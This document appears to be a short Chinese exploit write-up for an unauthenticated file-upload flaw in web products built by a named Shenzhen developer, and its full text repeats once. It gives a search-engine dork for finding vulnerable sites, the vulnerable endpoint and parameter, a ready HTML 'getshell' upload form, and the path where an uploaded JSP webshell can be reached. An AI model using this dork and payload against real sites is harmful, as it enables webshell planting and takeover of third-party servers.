VULHUB ™

网站建设专家：深圳市恩捷科技有限公司 http://www.szenjie.com/ 百度dork：inurl:fo/home.jsp 反编译文件 WEB-INF/classes/com/ej/ss/common/action/UploadFileAction.class  可以看出，通过获取参数fileType的值，给变量path赋值（上传的路径），之后直接上传。 本地构造上传页面，直接 action 给 http://website/common/uploadFile.do?fileType=productDesc 即可。 ``` <form method='post' action='http://website/common/uploadFile.do?fileType=productDesc' enctype="multipart/form-data" > <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/> <button type=submit value="getshell">getshell</button> </form> ``` 上传成功后，会提示文件路径（或直接访问 http://website/upload/img/productDesc/文件名.jsp）

网站建设专家：深圳市恩捷科技有限公司 http://www.szenjie.com/ 百度dork：inurl:fo/home.jsp 反编译文件 WEB-INF/classes/com/ej/ss/common/action/UploadFileAction.class  可以看出，通过获取参数fileType的值，给变量path赋值（上传的路径），之后直接上传。 本地构造上传页面，直接 action 给 http://website/common/uploadFile.do?fileType=productDesc 即可。 ``` <form method='post' action='http://website/common/uploadFile.do?fileType=productDesc' enctype="multipart/form-data" > <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/> <button type=submit value="getshell">getshell</button> </form> ``` 上传成功后，会提示文件路径（或直接访问 http://website/upload/img/productDesc/文件名.jsp）